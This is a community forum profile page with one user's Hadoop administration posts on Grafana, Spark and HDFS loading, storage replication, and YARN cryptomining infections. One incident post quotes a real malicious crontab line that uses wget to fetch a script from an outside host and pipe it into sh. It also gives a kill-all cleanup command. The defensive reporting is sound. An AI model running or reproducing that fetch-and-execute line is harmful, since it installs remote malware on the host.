Member since: 06-24-2018
Posts: 59
Kudos Received: 8
Solutions: 4
My Accepted Solutions
Title | Views | Posted
---|---|---
 | 9529 | 01-12-2019 05:48 AM
 | 16938 | 08-26-2018 10:41 AM
 | 6808 | 08-13-2018 05:39 AM
 | 5607 | 08-06-2018 07:45 AM
10-10-2023
10:06 AM
Grafana is a popular open-source platform for monitoring and observability. It is commonly associated with telemetry data visualization, especially when integrated with time-series databases like Prometheus, InfluxDB, or Elasticsearch. However, Grafana is not limited to telemetry data, and it can be used with a wide range of data sources, including HDFS and Hive tables. Here are some options for using Grafana for data visualization beyond telemetry:

- Hive data sources: Grafana has built-in support for various data sources and offers plugins for connecting to databases and data lakes. You can configure Grafana to connect to Hive as a data source and visualize data stored in Hive tables.
- HDFS data sources: While Grafana primarily focuses on time-series data, you can still use it to visualize data stored in HDFS by connecting it to Hadoop-related data sources, or by exporting HDFS data to another data store that Grafana supports (e.g., Elasticsearch, InfluxDB).
- SQL databases: Grafana can connect to traditional relational databases using SQL data sources. If you have data stored in SQL databases, you can use Grafana to create dashboards and visualizations.
- Log data: Grafana can be used for log data analysis and visualization. You can integrate it with tools like Loki (for log aggregation) and explore log data in dashboards.
- Custom plugins: If you have a unique data source or a specific format, you can develop custom data source plugins for Grafana to connect to your data and visualize it as needed.
- API data: Grafana supports various data sources that expose data through APIs. You can connect to REST APIs, GraphQL APIs, and other web services to visualize data.
- Mixed data sources: Grafana allows you to create dashboards that combine data from multiple sources, making it versatile for various data visualization needs.

While Grafana is flexible and can be used with a wide range of data sources, it's important to consider the nature of your data and your specific visualization requirements. Depending on your use case, you may need to choose the most suitable data source, data format, and visualization options within Grafana to achieve your desired results.
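As a concrete illustration of the SQL-database route, below is a hedged sketch of registering a relational data source through Grafana's HTTP API. The Grafana host, admin credentials, data source name, and database details are all placeholder assumptions, and the mysql type simply stands in for whichever SQL endpoint fronts your data:

# All values here are hypothetical: adjust the host, credentials, and database.
$ curl -s -u admin:admin -H 'Content-Type: application/json' \
    -X POST http://localhost:3000/api/datasources \
    -d '{"name":"hive-reports","type":"mysql","access":"proxy","url":"sql-host:3306","database":"reports"}'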
03-08-2022
05:06 PM
In my case, the below cron entry was found:

$ sudo -u yarn crontab -l
*/10 * * * * wget http://vbyphnnymdjnsiau.3utilities.com/Bj2yso0 -O-|sh

It resulted in a flood of spurious processes initiated by the yarn user, shooting up the CPU, and nothing could be done to keep up with them. In some cases the number of entries was as high as 20k.

$ ps -ef | grep yarn
yarn 30321 30318 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30323 29152 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30330 29075 0 11:44 ? 00:00:00 rxNqqqOesC1HqN
yarn 30427 30319 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30773 1 0 10:34 ? 00:00:00 fexsOEvOv
yarn 31186 1 0 10:34 ? 00:00:00 GqOeeG5eCC1rO
yarn 31189 1 0 10:34 ? 00:00:00 ff1NrseqqffTHrve
yarn 31727 1 0 09:20 ? 00:00:00 ivxvj1Ei1
yarn 31731 31727 0 09:20 ? 00:00:04 ivxvj1Ei1
yarn 31770 1 0 09:20 ? 00:00:00 GjN1GxCsqE51fs
yarn 31771 31770 0 09:20 ? 00:00:21 GjN1GxCsqE51fs
yarn 31774 31770 0 09:20 ? 00:00:05 GjN1GxCsqE51fs
yarn 31790 1 0 09:20 ? 00:00:00 EvGeHe5OxfC
yarn 31791 31790 0 09:20 ? 00:00:23 EvGeHe5OxfC
yarn 31793 31790 0 09:20 ? 00:00:02 EvGeHe5OxfC
yarn 31803 1 0 09:20 ? 00:00:00 qCevqvvGff1
yarn 31804 31803 0 09:20 ? 00:00:18 qCevqvvGff1
yarn 31806 31803 0 09:20 ? 00:00:04 qCevqvvGff1
yarn 32243 1 0 10:35 ? 00:00:00 TNsNf5fqTEv5esOxx
yarn 32254 1 0 10:35 ? 00:00:00 qCevqvvGff1
yarn 32255 1 0 10:35 ? 00:00:00 seffjsOExr

Thanks for discussing and bringing up this issue.
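For anyone facing the same thing, here is a hedged cleanup sketch. The process names in the listing above are randomly generated, so verify ownership before killing anything, and expect to restart the NodeManager afterwards, since it also runs as yarn:

$ sudo -u yarn crontab -r    # remove the malicious crontab entry
$ sudo pkill -9 -u yarn      # kill every process owned by yarn, NodeManager included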
02-03-2019
05:09 AM
1 Kudo
Hello, loading data directly into Kafka without any service seems unlikely. However, you can execute a simple Kafka console producer to send all your data to the Kafka service. But if your requirement is to save data to HDFS, you need to include a few more services along with Kafka, for example: Crawlers >> Kafka console producer (or) Spark Streaming >> Flume >> HDFS. As your requirement is to store the data in HDFS rather than to stream it, I suggest you execute a Spark job; it will store your data to HDFS. Refer to the commands below to run a Spark job that moves data to HDFS. Initiate a spark-shell, then execute the following commands in the same order:

val moveFile = sc.textFile("file:///path/to/Sample.log")
moveFile.saveAsTextFile("hdfs:///tmp/Sample.log")
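If you do want to push the file through Kafka first, here is a minimal sketch of the console-producer step. The broker address and topic name below are hypothetical, and depending on your distribution the script may be named kafka-console-producer.sh:

$ kafka-console-producer --broker-list localhost:9092 --topic sample-topic < /path/to/Sample.log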
12-03-2018
09:33 PM
This may be a very basic question, but I ask because it is unclear from the data you've posted: have you accounted for replication? 50 GiB of HDFS file lengths summed up (hdfs dfs -du values) with 3x replication would be ~150 GiB of actual used space on the physical storage. The /dfs/dn directories are where the file block replicas are stored. Nothing unnecessary is retained in HDFS; however, a commonly overlooked item is older snapshots retaining data blocks that are no longer necessary. Deleting such snapshots frees the space still held by files that were deleted after the snapshot was taken. If you're unable to grow your cluster but need to store more data, you may sacrifice availability of data by lowering your default replication to 2x or 1x (via the dfs.replication config for new data writes, and hdfs dfs -setrep n for existing data).
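A quick sketch of the checks and the replication change described above, assuming /data is the directory in question (a hypothetical path):

$ hdfs dfs -du -s -h /data      # summed file lengths, before replication
$ hdfs dfsadmin -report         # "DFS Used" shows raw bytes across all DataNodes
$ hdfs dfs -setrep -R 2 /data   # re-replicate existing data at 2x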
10-18-2018
06:20 PM
Since I was hit with the mining virus, which would continuously submit its mining procedure to port 8088, I changed my YARN port to 8089 and that solved it.
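For reference, the ResourceManager web UI port is governed by the yarn.resourcemanager.webapp.address property; a quick way to check the current value, assuming the usual /etc/hadoop/conf location:

$ grep -A1 'yarn.resourcemanager.webapp.address' /etc/hadoop/conf/yarn-site.xml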
10-17-2018
01:53 AM
I have posted the answer in a previous reply; can you please be more specific? Check this post, I replied there: http://community.cloudera.com/t5/Cloudera-Manager-Installation/Yarn-Node-Manager-unexpected-exists-occurring-after/m-p/79048#M14736
08-26-2018
10:41 AM
3 Kudos
The dr.who issue is very common these days; I am not sure who is exploiting the open-source project, but the main cause is usually a remote shell script that gets attached to your ResourceManager node, which causes the dr.who jobs to spawn. You don't need to Kerberize the cluster; just use a Linux firewall to restrict access. Thanks
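As a hedged illustration of the firewall approach, here is an iptables sketch that limits the ResourceManager web UI (port 8088) to a trusted subnet; the CIDR is a placeholder for your own network:

$ iptables -A INPUT -p tcp --dport 8088 -s 10.0.0.0/24 -j ACCEPT    # trusted subnet only
$ iptables -A INPUT -p tcp --dport 8088 -j DROP                     # drop everyone else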
08-15-2018
11:51 PM
Can you please share the logs, plus a screenshot of that particular host? Thanks